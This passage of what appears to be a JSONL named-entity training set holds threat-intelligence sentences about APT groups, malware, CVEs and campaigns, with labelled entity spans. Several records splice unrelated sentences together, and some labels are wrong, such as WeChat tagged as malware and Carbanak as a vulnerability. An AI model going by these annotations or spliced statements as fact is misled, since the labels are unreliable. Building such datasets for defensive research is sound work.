that threat groups like TG-1314 will continue to live off of the land to avoid detection and conduct their operations .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "ORGANIZATION: TG-1314": [[68, 75]]}, "info": {"id": "cyberner_stix_train_006993", "source": "cyberner_stix_train"}} {"text": "The actor attempts to exploit CVE-2018–8440 — an elevation of privilege vulnerability in Windows when it improperly handles calls to Advanced Local Procedure Call — to elevate the privileges using a modified proof-of-concept exploit . The China-backed Barium APT is suspected to be at the helm of the project .", "spans": {"THREAT_ACTOR: actor": [[4, 9]], "VULNERABILITY: CVE-2018–8440": [[30, 43]], "VULNERABILITY: vulnerability": [[72, 85]], "VULNERABILITY: proof-of-concept": [[208, 224]], "VULNERABILITY: exploit": [[225, 232]], "THREAT_ACTOR: Barium": [[252, 258]]}, "info": {"id": "cyberner_stix_train_006994", "source": "cyberner_stix_train"}} {"text": "Eventually , the screen PIN preferences will be saved to an additional XML file in the shared preferences folder . The dropped PE file has the distinctive file name 8.t” . 
Between December 28 , 2016 and January 1 , 2017 , CTU researchers observed a phishing campaign targeting Middle Eastern organizations .", "spans": {"TOOL: PE": [[127, 129]], "MALWARE: 8.t”": [[165, 169]], "ORGANIZATION: CTU": [[222, 225]]}, "info": {"id": "cyberner_stix_train_006995", "source": "cyberner_stix_train"}} {"text": "Our investigation of APT28 ’s compromise of WADA ’s network , and our observations of the surrounding events reveal how Russia sought to counteract a damaging narrative and delegitimize the institutions leveling criticism .", "spans": {"THREAT_ACTOR: APT28": [[21, 26]], "ORGANIZATION: WADA": [[44, 48]]}, "info": {"id": "cyberner_stix_train_006996", "source": "cyberner_stix_train"}} {"text": "This subset of SPLM / CHOPSTICK activity leads into several small surprises that take us into 2018 , to be discussed in further detail at SAS 2018 .", "spans": {"MALWARE: SPLM": [[15, 19]], "MALWARE: CHOPSTICK": [[22, 31]], "ORGANIZATION: SAS": [[138, 141]]}, "info": {"id": "cyberner_stix_train_006997", "source": "cyberner_stix_train"}} {"text": "They are believed to have successfully attacked the Ministries of Internal and Foreign Affairs of several ex-Soviet countries , as well as Eastern European governments and military institutions , and NATO and the White House .", "spans": {"ORGANIZATION: Ministries of Internal": [[52, 74]], "ORGANIZATION: Foreign Affairs": [[79, 94]], "ORGANIZATION: NATO": [[200, 204]], "ORGANIZATION: White House": [[213, 224]]}, "info": {"id": "cyberner_stix_train_006998", "source": "cyberner_stix_train"}} {"text": "Skype ; 3rd party stores only Most of these apps are well established and available on Google Play , however , com.skype.rover appears to be available only on third-party app stores . In these instances , APT41 leveraged TeamViewer to transfer malware into the compromised environment , although we do not have direct evidence of APT41 compromising TeamViewer . 
As researchers continued discovering new toolsets that were created and used by the same group that had been operating MiniDuke , and thus the threat actor operating the toolsets started to be commonly referred to as \" Dukes \" .", "spans": {"SYSTEM: Skype": [[0, 5]], "SYSTEM: Google Play": [[87, 98]], "THREAT_ACTOR: APT41": [[205, 210], [330, 335]], "TOOL: TeamViewer": [[221, 231]], "MALWARE: MiniDuke": [[481, 489]], "THREAT_ACTOR: Dukes": [[581, 586]]}, "info": {"id": "cyberner_stix_train_006999", "source": "cyberner_stix_train"}} {"text": "During our analysis , the C2 server provided a secondary payload that functionally appeared similar to the initial Zebrocy sample .", "spans": {"TOOL: C2": [[26, 28]], "MALWARE: Zebrocy": [[115, 122]]}, "info": {"id": "cyberner_stix_train_007000", "source": "cyberner_stix_train"}} {"text": "Chinese language traces in the code : During the investigation , the Cybereason Nocturnus team discovered code artifacts that may indicate Chinese threat actors . FIN7 thus continue to use effective spearphishing campaigns in conjunction with well-known MS Office exploits generated by the framework . Coincidentally , following the recent hack of a US Navy contractor and theft of highly sensitive data on submarine warfare , we have found evidence of very recent activity by a group referred to as APT15 , known for committing cyber espionage which is believed to be affiliated with the Chinese government .", "spans": {"ORGANIZATION: Cybereason Nocturnus": [[69, 89]], "THREAT_ACTOR: FIN7": [[163, 167]], "ORGANIZATION: Navy": [[353, 357]], "THREAT_ACTOR: APT15": [[500, 505]], "THREAT_ACTOR: cyber espionage": [[529, 544]]}, "info": {"id": "cyberner_stix_train_007001", "source": "cyberner_stix_train"}} {"text": "If a bot was installed on a network that was of interest to the hacking group , this bot was then used to upload one of the remote access programs . 
UMBRAGE components cover keyloggers , password collection , webcam capture , data destruction , persistence , privilege escalation , stealth , anti-virus (PSP) avoidance and survey techniques .", "spans": {"MALWARE: bot": [[5, 8]], "FILEPATH: UMBRAGE": [[149, 156]]}, "info": {"id": "cyberner_stix_train_007002", "source": "cyberner_stix_train"}} {"text": "Port 6208 : IMO extraction service . Symantec detects this threat as Backdoor.Nidiran . Meetings minutes of different Palestinian organizations . Request a demo meeting with us or reach out to us at salesthreatconnect.com to see how we can help automate phishing analysis and response for your organization .", "spans": {"SYSTEM: IMO": [[12, 15]], "ORGANIZATION: Symantec": [[37, 45]], "MALWARE: Backdoor.Nidiran": [[69, 85]], "ORGANIZATION: salesthreatconnect.com": [[199, 221]]}, "info": {"id": "cyberner_stix_train_007003", "source": "cyberner_stix_train"}} {"text": "Poseidon has maintained a consistently evolving toolkit since the mid-2000s . The attackers try to lure targets through spear phishing emails that include compressed executables .", "spans": {"THREAT_ACTOR: Poseidon": [[0, 8]], "TOOL: emails": [[135, 141]]}, "info": {"id": "cyberner_stix_train_007004", "source": "cyberner_stix_train"}} {"text": "Taking this information from directory listings , like the one shown above , allowed for the decryption of all content . Infy engaged in malware spearphishing against the same targets as Flying Kitten from the outset of its campaign ; Operation Cleaver has registered several resources related to development agencies that have been the subject of intrusion attempts by others since February 2014 . advanbusiness.com businessconsults.net businessformars.com companyinfosite.com conferencesinfo.com copporationnews.com . 
Unfortunately , the CSP policy ca n’t discriminate based on the Tag ID .", "spans": {"TOOL: Infy": [[121, 125]], "ORGANIZATION: development agencies": [[297, 317]], "DOMAIN: advanbusiness.com": [[399, 416]], "DOMAIN: businessconsults.net": [[417, 437]], "DOMAIN: businessformars.com": [[438, 457]], "DOMAIN: companyinfosite.com": [[458, 477]], "DOMAIN: conferencesinfo.com": [[478, 497]], "DOMAIN: copporationnews.com": [[498, 517]], "SYSTEM: CSP": [[540, 543]]}, "info": {"id": "cyberner_stix_train_007005", "source": "cyberner_stix_train"}} {"text": "Locky distribution ceased in June and July but returned in August with volumes rivaling the peaks of 2016 .", "spans": {"MALWARE: Locky": [[0, 5]]}, "info": {"id": "cyberner_stix_train_007006", "source": "cyberner_stix_train"}} {"text": "We decided to call the operation “ ViceLeaker ” , because of strings and variables in its code . Booz Allen Hamilton in 2014 and AhnLab in 2015 reported on Bisonal using a simple XOR cipher to hide the C2 address strings in the body . For example , Bisonal malware in 2012 used send() and recv() APIs to communicate with its C2 This Bisonal variant used in the latest attack communicates with one of the following hard-coded C2 addresses by using the HTTP POST method on TCP port 443 . The downloader malware uses the configuration file and connects to the C2 server to fetch the next payload . 
Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected .", "spans": {"MALWARE: ViceLeaker": [[35, 45]], "ORGANIZATION: Booz Allen Hamilton": [[97, 116]], "ORGANIZATION: AhnLab": [[129, 135]], "THREAT_ACTOR: Bisonal malware": [[249, 264]], "MALWARE: Bisonal": [[333, 340]], "TOOL: downloader": [[490, 500]], "TOOL: C2": [[557, 559]]}, "info": {"id": "cyberner_stix_train_007007", "source": "cyberner_stix_train"}} {"text": "All the domains in both batches were initially registered with the same alias : “ John Kasai of Klagenfurt , Austria ” .", "spans": {}, "info": {"id": "cyberner_stix_train_007008", "source": "cyberner_stix_train"}} {"text": "User clicks link to attacker controlled website .", "spans": {}, "info": {"id": "cyberner_stix_train_007009", "source": "cyberner_stix_train"}} {"text": "A BREXIT-themed lure document that delivers ZEKAPAB malware .", "spans": {"MALWARE: ZEKAPAB": [[44, 51]]}, "info": {"id": "cyberner_stix_train_007010", "source": "cyberner_stix_train"}} {"text": "Based on our findings Linux.GreedyAntd 's operations closely resemble previous cryptojacking campaigns deployed by Pacha Group in the past . While the Sima moniker could similarly originate from software labels , it is a common female Persian name and a Persian-language Word for \" visage \" or \" appearance \" . Given its use in more advanced social engineering campaigns against women 's rights activists , the label seem particularly apt .", "spans": {"TOOL: Linux.GreedyAntd": [[22, 38]], "TOOL: Word": [[271, 275]], "ORGANIZATION: social engineering campaigns": [[342, 370]], "ORGANIZATION: women 's rights activists": [[379, 404]]}, "info": {"id": "cyberner_stix_train_007011", "source": "cyberner_stix_train"}} {"text": "Our analysis shows that the threat actor behind the FakeSpy malware is a Chinese-speaking group , commonly referred to as \" Roaming Mantis '' , a group that is known to have launched similar campaigns in the past . 
The samples we analyzed originated from the Philippines . These VNC exectuables would either be included in the SFX file or downloaded by the batch script .", "spans": {"MALWARE: FakeSpy": [[52, 59]], "ORGANIZATION: Roaming Mantis": [[124, 138]], "MALWARE: samples": [[219, 226]], "MALWARE: VNC": [[279, 282]]}, "info": {"id": "cyberner_stix_train_007012", "source": "cyberner_stix_train"}} {"text": "However , in September last year , our friends at CSIS published a blog detailing a new Carbanak variant affecting one of its customers . The China Chopper actor activity starts with the download and execution of two exploit files which attempt to exploit the Windows vulnerabilities CVE-2015-0062 , CVE-2015-1701 and CVE-2016-0099 to allow the attacker to modify other objects on the server .", "spans": {"ORGANIZATION: CSIS": [[50, 54]], "VULNERABILITY: Carbanak": [[88, 96]], "FILEPATH: China Chopper": [[142, 155]], "VULNERABILITY: exploit": [[217, 224], [248, 255]], "SYSTEM: Windows": [[260, 267]], "VULNERABILITY: CVE-2015-0062": [[284, 297]], "VULNERABILITY: CVE-2015-1701": [[300, 313]], "VULNERABILITY: CVE-2016-0099": [[318, 331]], "THREAT_ACTOR: attacker": [[345, 353]]}, "info": {"id": "cyberner_stix_train_007013", "source": "cyberner_stix_train"}} {"text": "This module monitors a wide range of device activities including application installation / remove / update , phone restart and battery charge . 
The exploit installs Silence’s loader , designed to download backdoors and other malicious programs .", "spans": {"MALWARE: module": [[5, 11]], "VULNERABILITY: exploit": [[149, 156]], "THREAT_ACTOR: Silence’s": [[166, 175]]}, "info": {"id": "cyberner_stix_train_007014", "source": "cyberner_stix_train"}} {"text": "including the functionality to steal passwords , take screenshots , log keystrokes , and steal files .", "spans": {}, "info": {"id": "cyberner_stix_train_007015", "source": "cyberner_stix_train"}} {"text": "HummingWhale has also been observed hiding the original malicious app once it 's installed and trying to improve its Google Play reputation by automatically generating posts disguised as positive user comments and ratings . This reverse engineering report looks at the RATs and staging malware found within the Lazarus Group 's collection . DarkComet ( Backdoor.Breut ) : Another commodity RAT used to open a backdoor on an infected computer and steal information . Lastly , the command supplies a file named “ s1.txt ” in the \" pack\\scil\\ \" folder of the attacker 's ISO .", "spans": {"MALWARE: HummingWhale": [[0, 12]], "SYSTEM: Google Play": [[117, 128]], "TOOL: RATs": [[269, 273]], "TOOL: staging malware": [[278, 293]], "THREAT_ACTOR: Lazarus Group": [[311, 324]], "MALWARE: DarkComet": [[341, 350]], "MALWARE: Backdoor.Breut": [[353, 367]]}, "info": {"id": "cyberner_stix_train_007017", "source": "cyberner_stix_train"}} {"text": "While they still use RAR SFX format for the initial payloads , ZeroT now uses a the legitimate McAfee utility ( SHA256 3124fcb79da0bdf9d0d1995e37b06f7929d83c1c4b60e38c104743be71170efe ) named mcut.exe instead of the Norman Safeground AS for sideloading as they have in the past .", "spans": {"TOOL: RAR": [[21, 24]], "TOOL: SFX": [[25, 28]], "MALWARE: ZeroT": [[63, 68]], "ORGANIZATION: McAfee": [[95, 101]], "FILEPATH: 3124fcb79da0bdf9d0d1995e37b06f7929d83c1c4b60e38c104743be71170efe": [[119, 183]], "FILEPATH: mcut.exe": [[192, 
200]], "ORGANIZATION: Norman Safeground AS": [[216, 236]]}, "info": {"id": "cyberner_stix_train_007018", "source": "cyberner_stix_train"}} {"text": "This application is freely available from poisonivy-rat.com .", "spans": {"DOMAIN: poisonivy-rat.com": [[42, 59]]}, "info": {"id": "cyberner_stix_train_007019", "source": "cyberner_stix_train"}} {"text": "GolfSpy encrypts all the stolen data using a simple XOR operation with a pre-configured key before sending it to the C & C server using the HTTP POST method . We believe they may have some links to North Korea , which may explain why ScarCruft decided to closely monitor them . The third module allows the operators to take a screenshot of the remote system . Instead , they can make money by marketing their services to other bad actors for a fee .", "spans": {"MALWARE: GolfSpy": [[0, 7]]}, "info": {"id": "cyberner_stix_train_007020", "source": "cyberner_stix_train"}} {"text": "In their latest leak , they have released the UNITEDRAKE NSA exploit , which is a remote access and control tool that can remotely target Windows-based systems to capture desired information and transfer it to a server . Dokument 09.06.2017.docx .", "spans": {"VULNERABILITY: UNITEDRAKE NSA exploit": [[46, 68]], "FILEPATH: Dokument 09.06.2017.docx": [[221, 245]]}, "info": {"id": "cyberner_stix_train_007021", "source": "cyberner_stix_train"}} {"text": "The entered data is forwarded to the cybercriminals . FireEye’s visibility into the operations of APT28 – a group we believe the Russian government sponsors – has given us insight into some of the government’s targets , as well as its objectives and the activities designed to further them . 
In the sample only the English version can be displayed to the user (that is hardcoded in the sample) .", "spans": {"ORGANIZATION: FireEye’s": [[54, 63]], "THREAT_ACTOR: APT28": [[98, 103]], "ORGANIZATION: Russian government": [[129, 147]]}, "info": {"id": "cyberner_stix_train_007022", "source": "cyberner_stix_train"}} {"text": "Some apps have started with clean versions , in an attempt to grow user bases and build the developer accounts ’ reputations . Both Win32/Barlaiy & Win32/PlugX.L are remote access \" trojans \" , which allow Barium to gather a victim 's information , control a victim 's device , install additional malware , and exfiltrate information fi-om a victim 's device . The buttons are all in Chinese , with the help of Google Translate and keen detective skills ( read : button clicking ) , we ’ve deciphered the functionality . These group policies contained instructions to copy a file from a server to the local hard drive and to schedule a task to run the copied file at a particular time .", "spans": {"TOOL: Win32/Barlaiy": [[132, 145]], "TOOL: Win32/PlugX.L": [[148, 161]], "THREAT_ACTOR: Barium": [[206, 212]], "TOOL: Google Translate": [[411, 427]]}, "info": {"id": "cyberner_stix_train_007023", "source": "cyberner_stix_train"}} {"text": "The Sofacy threat group continues to use their DealersChoice framework to exploit Flash vulnerabilities in their attack campaigns .", "spans": {"THREAT_ACTOR: Sofacy": [[4, 10]], "TOOL: DealersChoice": [[47, 60]], "TOOL: Flash": [[82, 87]]}, "info": {"id": "cyberner_stix_train_007024", "source": "cyberner_stix_train"}} {"text": "This page mimics a legitimate bank form and blocks the device screen until the user enters all the information . While not detected at the time , Microsoft 's antivirus and security products now detect this Barium malicious file and flag the file as \" Win32/ShadowPad.A \" . 
While the group has not yet demonstrated an ICS capability , RASPITE 's recent targeting focus and methodology are clear indicators of necessary activity for initial intrusion operations into an IT network to prepare the ACT for later potential ICS events .", "spans": {"ORGANIZATION: Microsoft": [[146, 155]], "THREAT_ACTOR: Barium": [[207, 213]], "MALWARE: Win32/ShadowPad.A": [[252, 269]], "MALWARE: ICS": [[318, 321], [519, 522]], "THREAT_ACTOR: RASPITE": [[335, 342]], "ORGANIZATION: IT": [[469, 471]]}, "info": {"id": "cyberner_stix_train_007025", "source": "cyberner_stix_train"}} {"text": "Our research on the RTM malware shows that the Russian banking system is still a target of choice for criminals . Back in February 2016 , Indian army officials issued a warning against the usage of three apps , WeChat , SmeshApp , and Line , fearing that these apps collected too much information if installed on smartphones used by Indian army personnel .", "spans": {"TOOL: RTM malware": [[20, 31]], "THREAT_ACTOR: criminals": [[102, 111]], "ORGANIZATION: army officials": [[145, 159]], "MALWARE: WeChat": [[211, 217]], "MALWARE: SmeshApp": [[220, 228]], "MALWARE: Line": [[235, 239]], "ORGANIZATION: army personnel": [[340, 354]]}, "info": {"id": "cyberner_stix_train_007026", "source": "cyberner_stix_train"}} {"text": "In addition to “ Free VPN Master Android , ” we ’ ve observed Red Alert 2.0 Trojans in the wild disguising themselves using names like : Flash Player or Update Flash Player Android Update or Android Antivirus Chrome Update or Google Update Update Google Market WhatsApp Viber OneCoin Wallet Pornhub Tactic FlashLight or PROFlashLight Finanzonline The vast majority of in-the-wild Red Alert 2.0 samples falsely present themselves as Adobe Flash player for Android , a utility that Adobe stopped supporting years ago . 
The compilation times of APT37 malware is consistent with a developer operating in the North Korea time zone ( UTC +8:30 ) and follows what is believed to be a typical North Korean workday . The BITS mechanism has existed since Windows XP up to the current Windows 10 versions and was developed to create download/upload jobs, mostly to update the OS . They will usually have found your email address via a data breach of a third party .", "spans": {"SYSTEM: Free VPN Master Android": [[17, 40]], "MALWARE: Red Alert 2.0": [[62, 75]], "SYSTEM: Flash Player": [[137, 149]], "SYSTEM: Update Flash Player": [[153, 172]], "SYSTEM: Android Update": [[173, 187]], "SYSTEM: Android Antivirus": [[191, 208]], "SYSTEM: Chrome Update": [[209, 222]], "SYSTEM: Google Update": [[226, 239]], "SYSTEM: Update Google Market": [[240, 260]], "SYSTEM: WhatsApp": [[261, 269]], "SYSTEM: Viber": [[270, 275]], "SYSTEM: OneCoin": [[276, 283]], "SYSTEM: Wallet": [[284, 290]], "MALWARE: Red Alert 2.0 samples": [[380, 401]], "SYSTEM: Adobe Flash player": [[432, 450]], "SYSTEM: Android": [[455, 462]], "ORGANIZATION: Adobe": [[480, 485]], "TOOL: APT37 malware": [[542, 555]], "TOOL: BITS": [[712, 716]], "SYSTEM: Windows XP": [[745, 755]], "SYSTEM: Windows 10": [[774, 784]], "VULNERABILITY: data breach of a third party": [[924, 952]]}, "info": {"id": "cyberner_stix_train_007027", "source": "cyberner_stix_train"}} {"text": "Despite the group's proficiency , there are still many opportunities to detect and disrupt its operation by studying its modus operandi .", "spans": {}, "info": {"id": "cyberner_stix_train_007028", "source": "cyberner_stix_train"}} {"text": "In the actual targeted attack detected by the Hungarian National Security Agency , TeamSpy used components of the TeamViewer tool combined with other malware modules . 
In all emails sent to these government officials , the actor used the same attachment : a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload .", "spans": {"TOOL: TeamViewer tool": [[114, 129]], "TOOL: malware modules": [[150, 165]], "TOOL: emails": [[175, 181]], "ORGANIZATION: government officials": [[196, 216]], "FILEPATH: malicious Microsoft Word document": [[258, 291]], "VULNERABILITY: CVE-2012-0158": [[311, 324]]}, "info": {"id": "cyberner_stix_train_007029", "source": "cyberner_stix_train"}} {"text": "The Lazarus Group was first identified in Novetta’s report Operation Blockbuster in February 2016 . The Silence.Main Trojan , which is the main stage of the attack , has a full set of commands to control a compromised computer .", "spans": {"THREAT_ACTOR: Lazarus": [[4, 11]], "ORGANIZATION: Novetta’s": [[42, 51]], "FILEPATH: Silence.Main Trojan": [[104, 123]]}, "info": {"id": "cyberner_stix_train_007030", "source": "cyberner_stix_train"}} {"text": "Unfortunately , there is a specific feature of Android vulnerabilities that means it is only possible to get rid of them by receiving an update from the device manufacturers . A variety of malware , including the PlugX tool , was shared with other known Chinese threat groups . It then creates a service named clr_optimization_v4.0.30229_32 , which is responsible for executing CLR.exe . 
The sample of LIGHTWORK we obtained includes eight hardcoded IEC-104 information object addresses ( IOA ) , which typically correlate with input or output data elements on a device and may correspond to power line switches or circuit breakers in an RTU or relay configuration .", "spans": {"TOOL: PlugX tool": [[213, 223]], "FILEPATH: CLR.exe": [[378, 385]], "TOOL: LIGHTWORK": [[402, 411]]}, "info": {"id": "cyberner_stix_train_007031", "source": "cyberner_stix_train"}} {"text": "This is a first for an APT group , and shows Sednit has access to very sophisticated tools to conduct its espionage operations .", "spans": {"THREAT_ACTOR: Sednit": [[45, 51]]}, "info": {"id": "cyberner_stix_train_007032", "source": "cyberner_stix_train"}} {"text": "This campaign is tailored to identifying those who are running Bitcoin related software through specific system scans . The developers of Bookworm use these modules in a rather unique ACT , as the other embedded DLLs provide API functions for Leader to carry out its tasks .", "spans": {"MALWARE: Bookworm": [[138, 146]], "MALWARE: Leader": [[243, 249]]}, "info": {"id": "cyberner_stix_train_007033", "source": "cyberner_stix_train"}} {"text": "They have at some point used just about every cloaking and obfuscation technique under the sun in an attempt to go undetected . ALLANITE operations continue and intelligence indicates activity since at least May 2017 . 
A host firewall Several issues in Foxit PDF reader could lead to arbitrary code execution Foxit PDF Reader is one of the most popular PDF readers on the market , offering many similar features to Adobe Acrobat .", "spans": {"TOOL: Foxit PDF reader": [[253, 269]], "TOOL: Foxit PDF Reader": [[309, 325]], "TOOL: PDF readers": [[353, 364]], "ORGANIZATION: Adobe Acrobat": [[415, 428]]}, "info": {"id": "cyberner_stix_train_007034", "source": "cyberner_stix_train"}} {"text": "Cannon moves the downloaded file to the specified path .", "spans": {"MALWARE: Cannon": [[0, 6]]}, "info": {"id": "cyberner_stix_train_007035", "source": "cyberner_stix_train"}} {"text": "The payload turned out to be an open source penetration test toolkit called Koadic .", "spans": {}, "info": {"id": "cyberner_stix_train_007036", "source": "cyberner_stix_train"}} {"text": "] net , is now a legitimate version of the DroidVPN app , and looks as shown in Figure 1 below . RocketMan!” (probably a reference to Donald Trump’s nickname for Kim Jong Un) and MiamiBeach” serve as the first beacon messages from the victim to the control server . APT1 is a China-based cyber-espionage group , active since mid-2006 .", "spans": {"MALWARE: RocketMan!”": [[97, 108]], "MALWARE: MiamiBeach”": [[179, 190]], "THREAT_ACTOR: APT1": [[266, 270]]}, "info": {"id": "cyberner_stix_train_007037", "source": "cyberner_stix_train"}} {"text": "Coverage Additional ways our customers can detect and block this threat are listed below . The Machete group sends very specific emails directly to its victims , and these change from target to target . 
In early 2014 , the APT38 deployed NESTEGG ( a backdoor ) and KEYLIME ( a keylogger ) malware designed to impact financial institution-specific systems at a Southeast Asian bank .", "spans": {"THREAT_ACTOR: Machete": [[95, 102]], "THREAT_ACTOR: APT38": [[223, 228]], "MALWARE: NESTEGG": [[238, 245]], "MALWARE: KEYLIME": [[265, 272]], "MALWARE: keylogger": [[277, 286]], "ORGANIZATION: bank": [[376, 380]]}, "info": {"id": "cyberner_stix_train_007038", "source": "cyberner_stix_train"}} {"text": "2015 , APT28 targets Russian rockers and dissidents Pussy Riot via spear-phishing emails .", "spans": {"THREAT_ACTOR: APT28": [[7, 12]], "TOOL: emails": [[82, 88]]}, "info": {"id": "cyberner_stix_train_007039", "source": "cyberner_stix_train"}} {"text": "Tools such as PlugX have historically been leveraged by threat groups operating in the PRC .", "spans": {"MALWARE: PlugX": [[14, 19]], "ORGANIZATION: PRC": [[87, 90]]}, "info": {"id": "cyberner_stix_train_007040", "source": "cyberner_stix_train"}} {"text": "This particular HenBox variant , as listed in Table 3 above , harvests data from two popular messaging and social media apps : Voxer Walkie Talkie Messenger ( com.rebelvox.voxer ) and Tencent ’ s WeChat ( com.tencent.mm ) . APT41 has used several malware families that have also been used by other Chinese espionage operators , including variants of HIGHNOON , HOMEUNIX , PHOTO , SOGU , and ZXSHELL , among others . 
Of note , we also discovered the Sofacy group using a very similar delivery document to deliver a new Trojan called Cannon .", "spans": {"MALWARE: HenBox": [[16, 22]], "SYSTEM: Voxer": [[127, 132]], "SYSTEM: Walkie Talkie": [[133, 146]], "SYSTEM: Messenger": [[147, 156]], "ORGANIZATION: Tencent": [[184, 191]], "SYSTEM: WeChat": [[196, 202]], "THREAT_ACTOR: APT41": [[224, 229]], "TOOL: HIGHNOON": [[350, 358]], "TOOL: HOMEUNIX": [[361, 369]], "TOOL: PHOTO": [[372, 377]], "TOOL: SOGU": [[380, 384]], "TOOL: ZXSHELL": [[391, 398]], "THREAT_ACTOR: Sofacy group": [[449, 461]], "MALWARE: Trojan": [[518, 524]], "MALWARE: Cannon": [[532, 538]]}, "info": {"id": "cyberner_stix_train_007042", "source": "cyberner_stix_train"}} {"text": "Thanks to a relative lack of security controls applied to mobile devices , these devices have become very attractive targets for a broad range of malicious actors . According to ESET telemetry , Okrum was first detected in December 2016 , and targeted diplomatic missions in Slovakia , Belgium , Chile , Guatemala and Brazil throughout 2017 . Lazarus Group is a threat group that has been attributed to the North Korean government .", "spans": {"ORGANIZATION: ESET": [[178, 182]], "MALWARE: Okrum": [[195, 200]], "THREAT_ACTOR: Lazarus Group": [[343, 356]], "ORGANIZATION: North Korean government": [[407, 430]]}, "info": {"id": "cyberner_stix_train_007043", "source": "cyberner_stix_train"}} {"text": "Two years back , in the month of March we reported , NQ Mobile Security Research Center uncovered the world 's first Android bootkit malware called 'DKFBootKit ' , that replaces certain boot processes and can begin running even before the system is completely booted up . The computers of diplomats , military attachés , private assistants , secretaries to Prime Ministers , journalists and others are under the concealed control of unknown assailant (s ) . 
While APT1 intruders occasionally use publicly available backdoors such as Poison Ivy and Gh0st RAT , the vast majority of the time they use what appear to be their own custom backdoors . Researchers have uncovered an ongoing cyberespionage campaign targeting more than 30 online video game companies over the past four years .", "spans": {"ORGANIZATION: NQ Mobile Security": [[53, 71]], "SYSTEM: Android": [[117, 124]], "ORGANIZATION: diplomats": [[289, 298]], "ORGANIZATION: military attachés": [[301, 318]], "ORGANIZATION: private assistants": [[321, 339]], "ORGANIZATION: secretaries": [[342, 353]], "ORGANIZATION: Prime Ministers": [[357, 372]], "ORGANIZATION: journalists": [[375, 386]], "THREAT_ACTOR: APT1": [[464, 468]], "MALWARE: Poison Ivy": [[533, 543]], "MALWARE: Gh0st RAT": [[548, 557]], "ORGANIZATION: Researchers": [[646, 657]], "ORGANIZATION: online video game companies": [[731, 758]]}, "info": {"id": "cyberner_stix_train_007044", "source": "cyberner_stix_train"}} {"text": "This file is decrypted and injected into an instance of InstallUtiil.exe , and functions as a Tor anonymizer . PROMETHIUM and NEODYMIUM both used an exploit for CVE-2016-4117 , a vulnerability in Adobe Flash Player that , at the time , was both unknown and unpatched .", "spans": {"MALWARE: InstallUtiil.exe": [[56, 72]], "MALWARE: Tor": [[94, 97]], "MALWARE: anonymizer": [[98, 108]], "THREAT_ACTOR: PROMETHIUM": [[111, 121]], "THREAT_ACTOR: NEODYMIUM": [[126, 135]], "VULNERABILITY: exploit": [[149, 156]], "VULNERABILITY: CVE-2016-4117": [[161, 174]], "TOOL: Flash": [[202, 207]]}, "info": {"id": "cyberner_stix_train_007045", "source": "cyberner_stix_train"}} {"text": "In this report , we'll review how NetTraveler attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan . 
The group has also targeted businesses operating in the South China Sea , which is a strategically important region and the focus of disputes between China and other states .", "spans": {"TOOL: NetTraveler": [[34, 45]], "VULNERABILITY: CVE-2012-0158": [[67, 80]], "TOOL: NetTraveler Trojan": [[96, 114]], "ORGANIZATION: businesses": [[145, 155]]}, "info": {"id": "cyberner_stix_train_007046", "source": "cyberner_stix_train"}} {"text": "Industrial safety systems are highly redundant and separate controls which override and manage industrial processes if they approach unsafe conditions such as over-pressurization , overspeed , or over-heating .", "spans": {}, "info": {"id": "cyberner_stix_train_007047", "source": "cyberner_stix_train"}} {"text": "This time , however , attackers opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) . The latest version of Madi also has the ability to monitor the Russian social network Vkontakte ( VK ) along with the Jabber messaging platform to look for users who visit websites that contain words like \" USA \" , \" Skype \" , and \" gov \" .", "spans": {"MALWARE: Microsoft Word attachment": [[84, 109]], "VULNERABILITY: CVE-2017-0199": [[142, 155]], "TOOL: ZeroT Trojan": [[170, 182]], "TOOL: PlugX Remote Access Trojan": [[214, 240]], "TOOL: RAT": [[243, 246]]}, "info": {"id": "cyberner_stix_train_007048", "source": "cyberner_stix_train"}} {"text": "Keeping in mind the sensitivity of passwords , GoCrack includes an entitlement-based system that prevents users from accessing task data unless they are the original creator or they grant additional users to the task . 
Both attachments are malicious Word documents that attempt to exploit the Windows OLE Automation Array Remote Code Execution Vulnerability tracked by CVE-2014-6332 .", "spans": {"THREAT_ACTOR: GoCrack": [[47, 54]], "ORGANIZATION: additional users": [[188, 204]], "FILEPATH: malicious Word documents": [[240, 264]], "VULNERABILITY: exploit": [[281, 288]], "SYSTEM: Windows": [[293, 300]], "TOOL: OLE Automation Array Remote Code Execution": [[301, 343]], "VULNERABILITY: Vulnerability": [[344, 357]], "VULNERABILITY: CVE-2014-6332": [[369, 382]]}, "info": {"id": "cyberner_stix_train_007049", "source": "cyberner_stix_train"}} {"text": "If you haven't heard about it for some reason , I would recommend to read this detailed report by Group-IB , as this APT attacks not only Russian banks , but also banks in more than 25 countries . In early May 2016 , both PROMETHIUM and NEODYMIUM started conducting attack campaigns against specific individuals in Europe .", "spans": {"ORGANIZATION: Group-IB": [[98, 106]], "ORGANIZATION: banks": [[146, 151], [163, 168]], "THREAT_ACTOR: PROMETHIUM": [[222, 232]], "THREAT_ACTOR: NEODYMIUM": [[237, 246]], "ORGANIZATION: specific individuals": [[291, 311]]}, "info": {"id": "cyberner_stix_train_007050", "source": "cyberner_stix_train"}} {"text": "Figure 5 . ScarCruft also attacked a diplomatic agency in Hong Kong , and another diplomatic agency in North Korea . To do that , it also drops a PowerShell script on the workstation to execute . • Bad actors who want to get into the cyber attack business need little to no technical skills to get started .", "spans": {"ORGANIZATION: diplomatic agency": [[37, 54], [82, 99]], "TOOL: PowerShell": [[146, 156]], "THREAT_ACTOR: Bad actors": [[198, 208]]}, "info": {"id": "cyberner_stix_train_007051", "source": "cyberner_stix_train"}} {"text": "The InterceptCall receiver is triggered whenever there is an incoming or outgoing call . 
